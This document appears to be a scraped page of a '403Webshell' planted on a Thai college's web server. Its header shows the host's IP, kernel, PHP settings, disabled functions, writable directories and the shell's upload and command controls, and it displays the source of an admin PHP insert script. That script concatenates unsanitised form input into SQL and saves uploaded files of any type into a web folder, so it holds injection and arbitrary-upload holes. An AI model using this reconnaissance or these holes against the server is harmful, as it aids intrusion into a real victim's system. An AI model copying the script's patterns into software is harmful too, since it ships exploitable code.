403Webshell
Server IP : 202.29.229.35  /  Your IP : 18.217.210.224
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/system_admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/system_admin//projectDepartment_Insert.php
<?php 
session_start();
if($_SESSION['r_statuslogin'] != 1){
 echo '<script language="javascript">alert("สำหรับผู้ดูแลระบบเท่านั้น")</script>';
 echo'<meta http-equiv="refresh" content="0;url=../index.php">';
 exit();
}
?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php

	include("connect/connect.php");
	$dp_ID=$_SESSION['r_workId'];//รหัสผุ้ที่เข้าใช้งานระบบและผู้บันทึกข้อมูล
	$adIDreg=$_SESSION['r_adID'];//pk admin
	
	$m_proName=$_POST['m_proName'];//ชื่ีอโครงการ
	$m_perResponsible=$_POST['m_perResponsible'];//ผุ้รับผิดชอบโครงการ
	$m_durationStart=$_POST['time_start'];//ระยะเวลาดำเนินการ (เริ่ม)
	$m_durationEnd=$_POST['time_end'];//ระยะเวลาดำเนินการ (สิ้นสุด)
	$m_location=$_POST['m_location'];//สถานที่ดำเนินการ
	$m_objective=$_POST['m_objective'];//วัตถุประสงค์
	$m_expense=$_POST['m_expense'];//ค่าใช้จ่าย
	$m_benefits=$_POST['m_benefits'];//ผลที่ไดรับ
	$m_participant=$_POST['m_participant'];//ผู้เข้าร่วมโครงการ
	$m_comment=$_POST['m_comment'];//ข้อเสนอแนะ
	$m_score=$_POST['m_score'];//ผลการประเมินโครงการ

		$photo=$_FILES["fileproject"]["tmp_name"];
		$photo_name=$_FILES["fileproject"]["name"];
		$photo_size=$_FILES["fileproject"]["size"];
		$photo_type=$_FILES["fileproject"]["type"];
		
		$ext = strtolower(end(explode('.', $photo_name)));
		if($ext=="pdf" or $ext=="rar" or $ext=="zip"){
		$new_pic=date("Y-m-dHis");
		$file_name=$new_pic.".".$ext;
		copy($photo,"filepdf_meeting/$file_name");
		}
	//$detail=$_POST['detail'];//รายละเอียด
	$date=date("Y:m:d");
	$time=date("h:i:s");
				
	$sql="insert into tbl_meeting values (null,'$m_proName','$m_perResponsible','$m_durationStart','$m_durationEnd','$m_location','$m_objective','$m_expense','$m_benefits','$m_participant','$m_comment','$date','$dp_ID','$adIDreg','$m_score','$file_name') ";
	//echo "---->".$sql;
	$result=mysql_query($sql,$connect1);
	
	if($result){
		
		$sql1="select max(m_ID) from tbl_meeting";
		$result1=mysql_query($sql1,$connect1);
		$rs1=mysql_fetch_array($result1);
		$nid_max=$rs1['0'];
		
			//---------เก็บ log-------------
	//$sqllog="insert into tbl_logfilemeeting values (null,'$dp_ID','1','$nid_max','$date','$time') ";
	//$resultlog=mysql_query($sqllog);

		if(isset($_FILES['upfile']['name'])){//ตรวจสอบว่าเป็นค่าว่างหรือไม่ ถ้าหากไม่ว่าง 
		$count=count($_FILES['upfile']['name']);//นับค่าว่าส่งมากี่ค่า จะกเก็บชือรูป
				for($i=0; $i<$count; $i++){
				$tmp=$_FILES['upfile']['tmp_name'][$i];
				
				$extpic=strtolower(end(explode(".",$_FILES['upfile']['name'][$i])));
				$date=date('Ymd-his')."_".rand(1,9999);
				$name=$nid_max."_".$date."_".$i.".".$extpic;
				
				//$name=$nid_max."_".$_FILES['upfile']['name'][$i];
				//echo "====".$name."<br>";
				move_uploaded_file($tmp,"pic_meeting/$name");//copy file รูปไปไว้ใน img
				//copy($tmp,"pic_new/$name");
			}
		}
			
			echo "<script language='javascript'>alert('บันทึกโครงการเรียบร้อยแล้ว')</script>";
			echo '<meta http-equiv="refresh" content="0;url=index.php?i=showmting_all&mID='.$dp_ID.'">';
			
	}else{
			echo "<script language='javascript'>alert('ไม่สามารถบันทึกโครงการได้')</script>";
			echo '<meta http-equiv="refresh" content="0;url=index.php?i=show_projectDptF">';
			}
		
?>


Youez - 2016 - github.com/yon3zu
LinuXploit